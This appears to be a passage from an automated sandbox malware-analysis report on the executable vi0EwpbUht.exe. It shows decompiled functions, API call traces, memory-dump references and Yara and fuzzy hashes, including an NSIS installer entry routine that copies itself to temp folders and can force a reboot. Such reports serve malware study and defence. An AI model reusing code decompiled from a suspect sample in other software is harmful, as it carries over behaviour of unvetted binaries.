                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C2F2
                                                                                                                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C325
                                                                                                                          • RegCloseKey.ADVAPI32(?,004028B0,00000000,?,00000004,00000000,004028A9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040C33B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                          • API String ID: 3677997916-4173385793
                                                                                                                          • Opcode ID: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction ID: c6bc4c080fc5fa975f8bb2417a4f68ba34bc7cc60baef9af76509d3dfd8a5f6d
                                                                                                                          • Opcode Fuzzy Hash: ee928b2e9c36cee54b4de11c3a3cd2293e0062a039f5b8df71b0887b07d0b7b2
                                                                                                                          • Instruction Fuzzy Hash: 1F01527A950308BAEB11EB90CD46BEA77ACDB04700F604176BA04F65C0E6B86A54D79D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040B220, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,Function_0000183E), ref: 0040B236
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,Function_0000183E), ref: 0040B249
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,Function_0000183E), ref: 0040B273
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,Function_0000183E), ref: 0040B2D0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 730355536-0
                                                                                                                          • Opcode ID: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                                                                          • Instruction ID: d2b02c823ba1647cc84e75737c235603f8a51179c48dc4d6faecaae88e00545b
                                                                                                                          • Opcode Fuzzy Hash: ba61bbd837529c5ecebdd7207d7d116191595f71cea53c0003d39ae1a509e98c
                                                                                                                          • Instruction Fuzzy Hash: B40184B02043406ED715AF699D0AB1A7BB5F745704F04847FA140BA2E1CBBE54B0CB5F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406520, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00406520(void* __eax, struct HICON__* __edx) {
				void _v32;
				void* _v40;
				void* _v48;
				void* _v52;
				void* _t17;
				void* _t20;
				struct _ICONINFO* _t23;

				_t9 = __eax;
				_t20 = __eax;
				if(__edx !=  *((intOrPtr*)(__eax + 0x1c))) {
					E004064E4(__eax);
					_t9 = __edx;
					 *((intOrPtr*)(_t20 + 0x1c)) = __edx;
					if(__edx != 0) {
						GetIconInfo(__edx, _t23);
						GetObjectA(_v40, 0x18,  &_v32);
						 *(_t20 + 0x18) = _v40;
						_t17 = _v52;
						if(_t17 != 0) {
							DeleteObject(_t17);
						}
						_t9 = _v48;
						if(_t9 != 0) {
							return DeleteObject(_t9);
						}
					}
				}
				return _t9;
			}










                                                                                                                          0x00406520
                                                                                                                          0x00406527
                                                                                                                          0x0040652c
                                                                                                                          0x00406530
                                                                                                                          0x00406535
                                                                                                                          0x00406537
                                                                                                                          0x0040653c
                                                                                                                          0x00406540
                                                                                                                          0x00406551
                                                                                                                          0x0040655a
                                                                                                                          0x0040655d
                                                                                                                          0x00406563
                                                                                                                          0x00406566
                                                                                                                          0x00406566
                                                                                                                          0x0040656b
                                                                                                                          0x00406571
                                                                                                                          0x00000000
                                                                                                                          0x00406574
                                                                                                                          0x00406571
                                                                                                                          0x0040653c
                                                                                                                          0x0040657e

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004064E4: DestroyCursor.USER32(00000000), ref: 004064F3
                                                                                                                          • GetIconInfo.USER32(?), ref: 00406540
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406551
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406566
                                                                                                                          • DeleteObject.GDI32(?), ref: 00406574
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3133107492-0
                                                                                                                          • Opcode ID: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                                                                          • Instruction ID: 2ae9454a62f4479f67ab2556911db7116a2ee9a23fb28f719fd143bfb6d196f5
                                                                                                                          • Opcode Fuzzy Hash: 57e2f9da13108c725cafe308d1a9a1f75ba6bb4e307d61bf9a431e00cd326d96
                                                                                                                          • Instruction Fuzzy Hash: B9F06DB1A003117BCB00EE7AAC8594B72DC9F44750B02083EB940FB386E638DD6487E9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040FFB8, Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040FF7C: DestroyCursor.USER32(00000000), ref: 0040FF8B
                                                                                                                          • GetIconInfo.USER32(?), ref: 0040FFD8
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 0040FFE9
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040FFFE
                                                                                                                          • DeleteObject.GDI32(?), ref: 0041000C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$Delete$CursorDestroyIconInfo
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3133107492-0
                                                                                                                          • Opcode ID: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                                                                          • Instruction ID: 2d28933f0b2e023a71d2f14a39f9032314a54afd7f494d7512fc5867bd48f6a1
                                                                                                                          • Opcode Fuzzy Hash: acb153883bb71467b8e7e04e19f1bbca08a1b42d08bc2ea88390571be6ea3eb5
                                                                                                                          • Instruction Fuzzy Hash: 67F06271A043155BCB14EEB99CC1A8B769C9F48754B00482AB850E7342E7B8DC8487E5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004105E0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteIconInfoObject
                                                                                                                          • String ID: ,k@
                                                                                                                          • API String ID: 2689914137-1053005162
                                                                                                                          • Opcode ID: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                                                                          • Instruction ID: 6eb33a66848ac9ac3950d349fa1ce54abc8aaa9849f71adcceb630d577d3c1da
                                                                                                                          • Opcode Fuzzy Hash: 4f7ffccf5db40a083c410197de935c7d3ae98d988f7c9ffe2f672e957eb47bb6
                                                                                                                          • Instruction Fuzzy Hash: B7414C71E0021A9FDF10DF99C881AAEBBB4FF48318F11406AD911B7381D778AD95CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0041133E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E468: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000,Function_00004ADA), ref: 0040E4A1
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00411368
                                                                                                                            • Part of subcall function 0040EAA0: GetTempPathA.KERNEL32(00000105,?,00000000,Function_00005072), ref: 0040EACE
                                                                                                                            • Part of subcall function 0040E468: GetCommandLineA.KERNEL32(00000000,Function_00004ADA), ref: 0040E4BB
                                                                                                                          • ShellExecuteA.SHELL32(00400000,open,00000000,?,?,?), ref: 00411401
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp Download File
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CommandCurrentDirectoryExecuteFileLineModuleNamePathShellTemp
                                                                                                                          • String ID: open
                                                                                                                          • API String ID: 2622400689-2758837156
                                                                                                                          • Opcode ID: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                                                                          • Instruction ID: ca9bbc1aa8f47e6c3f9ee794e5cc2909a51f6400e8153674fcf191bbd04044bb
                                                                                                                          • Opcode Fuzzy Hash: 3dfcb224a8b121a05150b7d78a53be97acece724c1d2c46a2dd075319d3e44da
                                                                                                                          • Instruction Fuzzy Hash: D211ED70F043198EEB10FB79CC81A89B375EF86308F4049B6A008B7191D67E6E858E5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: vi0EwpbUht.exe PID: 6184 Parent PID: 7096 vi0EwpbUht.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 004030CB, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270filestringcomCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f38 = _t34;
				 *0x423e84 = E00405CFF(8);
				SHGetFileInfoA(0x41f430, 0,  &_v360, 0x160, 0); // executed
				E004059DD("sail Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe\" ";
				E004059DD(_t96, _t39);
				 *0x423e80 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004054FB(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004054FB(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E00403097(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C22(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E0040344C();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f14; // 0x0
											if(__eflags != 0) {
												_t106 = E00405CFF(3);
												_t100 = E00405CFF(4);
												_t55 = E00405CFF(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f2c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E0040529E(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x423e9c; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x423f2c =  *0x423f2c | 0xffffffff;
										_v400 = E00403526();
										goto L32;
									}
									_t103 = E004054FB(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490";
										if(lstrcmpiA(_t105, "C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t101);
										}
										E004059DD(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x423e90; // 0x4868b0
											E004059FF(0, _t98, 0x41f030, 0x41f030,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x41f030);
											if(_v416 != 0 && CopyFileA("C:\\Users\\engineer\\AppData\\Local\\Temp\\3582-490\\vi0EwpbUht.exe", 0x41f030, 1) != 0) {
												_push(0);
												_push(0x41f030);
												E0040572B();
												_t77 =  *0x423e90; // 0x4868b0
												E004059FF(0, _t98, 0x41f030, 0x41f030,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E0040523D(0x41f030);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E0040572B();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E004055B1(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									E004059DD("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E00403097(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                                                                                                                          0x004030d7
                                                                                                                          0x004030db
                                                                                                                          0x004030e3
                                                                                                                          0x004030e5
                                                                                                                          0x004030ea
                                                                                                                          0x004030f5
                                                                                                                          0x004030fc
                                                                                                                          0x00403104
                                                                                                                          0x0040310e
                                                                                                                          0x00403124
                                                                                                                          0x00403134
                                                                                                                          0x00403139
                                                                                                                          0x0040313f
                                                                                                                          0x00403146
                                                                                                                          0x00403159
                                                                                                                          0x0040315e
                                                                                                                          0x00403160
                                                                                                                          0x00403162
                                                                                                                          0x00403167
                                                                                                                          0x00403167
                                                                                                                          0x00403177
                                                                                                                          0x0040317d
                                                                                                                          0x004031e6
                                                                                                                          0x004031e6
                                                                                                                          0x004031e8
                                                                                                                          0x004031ea
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403183
                                                                                                                          0x00403186
                                                                                                                          0x0040318e
                                                                                                                          0x0040318e
                                                                                                                          0x00403191
                                                                                                                          0x00403196
                                                                                                                          0x00403198
                                                                                                                          0x00403198
                                                                                                                          0x00403199
                                                                                                                          0x00403199
                                                                                                                          0x0040319e
                                                                                                                          0x004031a1
                                                                                                                          0x004031d6
                                                                                                                          0x004031db
                                                                                                                          0x004031e0
                                                                                                                          0x004031e3
                                                                                                                          0x004031e5
                                                                                                                          0x004031e5
                                                                                                                          0x004031e5
                                                                                                                          0x00000000
                                                                                                                          0x004031a3
                                                                                                                          0x004031a3
                                                                                                                          0x004031a4
                                                                                                                          0x004031a7
                                                                                                                          0x004031af
                                                                                                                          0x004031b2
                                                                                                                          0x004031b4
                                                                                                                          0x004031b4
                                                                                                                          0x004031b4
                                                                                                                          0x004031b2
                                                                                                                          0x004031b7
                                                                                                                          0x004031bd
                                                                                                                          0x004031c5
                                                                                                                          0x004031c8
                                                                                                                          0x004031ca
                                                                                                                          0x004031ca
                                                                                                                          0x004031ca
                                                                                                                          0x004031c8
                                                                                                                          0x004031cd
                                                                                                                          0x004031d4
                                                                                                                          0x004031ee
                                                                                                                          0x004031f1
                                                                                                                          0x004031f1
                                                                                                                          0x004031fa
                                                                                                                          0x004031ff
                                                                                                                          0x004031ff
                                                                                                                          0x0040320a
                                                                                                                          0x00403210
                                                                                                                          0x00403215
                                                                                                                          0x00403217
                                                                                                                          0x00403239
                                                                                                                          0x0040323e
                                                                                                                          0x00403245
                                                                                                                          0x0040324c
                                                                                                                          0x00403250
                                                                                                                          0x004032b7
                                                                                                                          0x004032b7
                                                                                                                          0x004032bc
                                                                                                                          0x004032c6
                                                                                                                          0x004033b1
                                                                                                                          0x004033b7
                                                                                                                          0x004033c2
                                                                                                                          0x004033cb
                                                                                                                          0x004033cd
                                                                                                                          0x004033d2
                                                                                                                          0x004033d4
                                                                                                                          0x004033d6
                                                                                                                          0x004033d8
                                                                                                                          0x004033da
                                                                                                                          0x004033dc
                                                                                                                          0x004033de
                                                                                                                          0x004033ee
                                                                                                                          0x004033f0
                                                                                                                          0x004033f2
                                                                                                                          0x004033ff
                                                                                                                          0x0040340e
                                                                                                                          0x00403416
                                                                                                                          0x0040341e
                                                                                                                          0x0040341e
                                                                                                                          0x004033f2
                                                                                                                          0x004033de
                                                                                                                          0x004033da
                                                                                                                          0x00403423
                                                                                                                          0x00403429
                                                                                                                          0x0040342b
                                                                                                                          0x0040342f
                                                                                                                          0x0040342f
                                                                                                                          0x0040342b
                                                                                                                          0x00403434
                                                                                                                          0x00403439
                                                                                                                          0x0040343c
                                                                                                                          0x0040343e
                                                                                                                          0x0040343e
                                                                                                                          0x00403446
                                                                                                                          0x00403446
                                                                                                                          0x004032d5
                                                                                                                          0x004032dc
                                                                                                                          0x004032dc
                                                                                                                          0x00403252
                                                                                                                          0x00403258
                                                                                                                          0x004032a7
                                                                                                                          0x004032a7
                                                                                                                          0x004032b3
                                                                                                                          0x00000000
                                                                                                                          0x004032b3
                                                                                                                          0x00403261
                                                                                                                          0x0040326e
                                                                                                                          0x00403265
                                                                                                                          0x0040326b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040326d
                                                                                                                          0x0040326d
                                                                                                                          0x0040326d
                                                                                                                          0x00403272
                                                                                                                          0x00403274
                                                                                                                          0x0040327c
                                                                                                                          0x004032e8
                                                                                                                          0x004032ed
                                                                                                                          0x004032fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403300
                                                                                                                          0x00403307
                                                                                                                          0x0040330d
                                                                                                                          0x00403313
                                                                                                                          0x0040331b
                                                                                                                          0x0040331b
                                                                                                                          0x00403329
                                                                                                                          0x00403330
                                                                                                                          0x00403339
                                                                                                                          0x0040333f
                                                                                                                          0x0040333f
                                                                                                                          0x0040334b
                                                                                                                          0x00403351
                                                                                                                          0x0040335b
                                                                                                                          0x0040336f
                                                                                                                          0x00403370
                                                                                                                          0x00403371
                                                                                                                          0x00403376
                                                                                                                          0x00403382
                                                                                                                          0x00403388
                                                                                                                          0x0040338f
                                                                                                                          0x00403392
                                                                                                                          0x00403398
                                                                                                                          0x00403398
                                                                                                                          0x0040338f
                                                                                                                          0x0040339c
                                                                                                                          0x004033a2
                                                                                                                          0x004033a2
                                                                                                                          0x004033a5
                                                                                                                          0x004033a6
                                                                                                                          0x004033a7
                                                                                                                          0x00000000
                                                                                                                          0x004033a7
                                                                                                                          0x0040327e
                                                                                                                          0x00403280
                                                                                                                          0x0040328b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403293
                                                                                                                          0x0040329e
                                                                                                                          0x004032a3
                                                                                                                          0x00000000
                                                                                                                          0x004032a3
                                                                                                                          0x0040321f
                                                                                                                          0x0040322b
                                                                                                                          0x00403230
                                                                                                                          0x00403235
                                                                                                                          0x00403237
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403237
                                                                                                                          0x00000000
                                                                                                                          0x004031d4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403188
                                                                                                                          0x00403188
                                                                                                                          0x00403188
                                                                                                                          0x00403189
                                                                                                                          0x00403189
                                                                                                                          0x00000000
                                                                                                                          0x00403188
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • #17.COMCTL32 ref: 004030EA
                                                                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004030F5
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 004030FC
                                                                                                                            • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                                            • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                                            • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                                                          • SHGetFileInfoA.SHELL32(0041F430,00000000,?,00000160,00000000,00000008), ref: 00403124
                                                                                                                            • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,sail Setup,NSIS Error), ref: 004059EA
                                                                                                                          • GetCommandLineA.KERNEL32(sail Setup,NSIS Error), ref: 00403139
                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000), ref: 0040314C
                                                                                                                          • CharNextA.USER32(00000000,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000020), ref: 00403177
                                                                                                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040320A
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040321F
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040322B
                                                                                                                          • DeleteFileA.KERNELBASE(1033), ref: 0040323E
                                                                                                                          • OleUninitialize.OLE32(00000000), ref: 004032BC
                                                                                                                          • ExitProcess.KERNEL32 ref: 004032DC
                                                                                                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000,00000000), ref: 004032E8
                                                                                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\3582-490,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe" ,00000000,00000000), ref: 004032F4
                                                                                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403300
                                                                                                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403307
                                                                                                                          • DeleteFileA.KERNEL32(0041F030,0041F030,?,00424000,?), ref: 00403351
                                                                                                                          • CopyFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe,0041F030,00000001), ref: 00403365
                                                                                                                          • CloseHandle.KERNEL32(00000000,0041F030,0041F030,?,0041F030,00000000), ref: 00403392
                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004033E7
                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403423
                                                                                                                          • ExitProcess.KERNEL32 ref: 00403446
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
